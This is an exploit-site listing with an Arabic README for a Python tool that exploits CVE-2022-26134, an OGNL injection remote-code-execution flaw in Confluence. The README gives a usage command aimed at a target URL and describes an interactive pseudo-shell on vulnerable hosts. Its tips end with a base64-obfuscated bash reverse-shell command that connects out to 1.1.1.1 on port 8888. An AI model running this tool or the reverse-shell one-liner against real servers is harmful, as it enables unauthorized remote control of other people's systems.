Sploitus

Exploit for CVE-2022-26134

kitploit · 2026-08-25

Exploit Code

MARKDOWN33 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SNCKER-CVE-2022-26134
# CVE-2022-26134

حقن تعبير OGNL في Confluence يؤدي إلى RCE(CVE-2022-26134) برهان المفهوم والاستغلال

## تحديث

إضافة تجاوز الصندوق الرملي (sandbox bypass)، ودعم الإصدارات العالية.

# الاستخدام

root@kitploit:~
    
    
    Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
    

سيتحقق السكريبت تلقائياً من وجود الثغرة في الهدف، وسيدخل إلى شبه شيل تفاعلي إذا كان الهدف ضعيفاً.

اختبار تحت لينكس:  
![linux](https://assets.kitploit.com/production/public/readmes/20311/d4b6ce94cad25db1f20d1c58ffa6dff5f230480530fc3e920852574bd0c31494.jpg)

اختبار تحت ويندوز:  
![windows](https://assets.kitploit.com/production/public/readmes/20311/0f988e15564df497927188a5d659797cbd14c90617aeae84ea1416923719618c.jpg)

فقط أدخل 'q' عند الرغبة في الخروج.

# بعض النصائح

يتم تمرير معاملات الأوامر مباشرة إلى دالة runtime.exec، التي لا تملك سياق الشيل.  
لذا.  
تحت ويندوز، لا يمكن تنفيذ بعض الأوامر مثل `dir` مباشرة، يمكنك استخدام `cmd.exe /c dir`.  
تحت لينكس، لا يمكن لبعض الرموز الخاصة أن تعمل. إذا كنت بحاجة لتنفيذ أمر يحتوي على رموز خاصة مثل reverse shell، يمكنك ترميزه بـ base64 ثم استخدام `bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}`.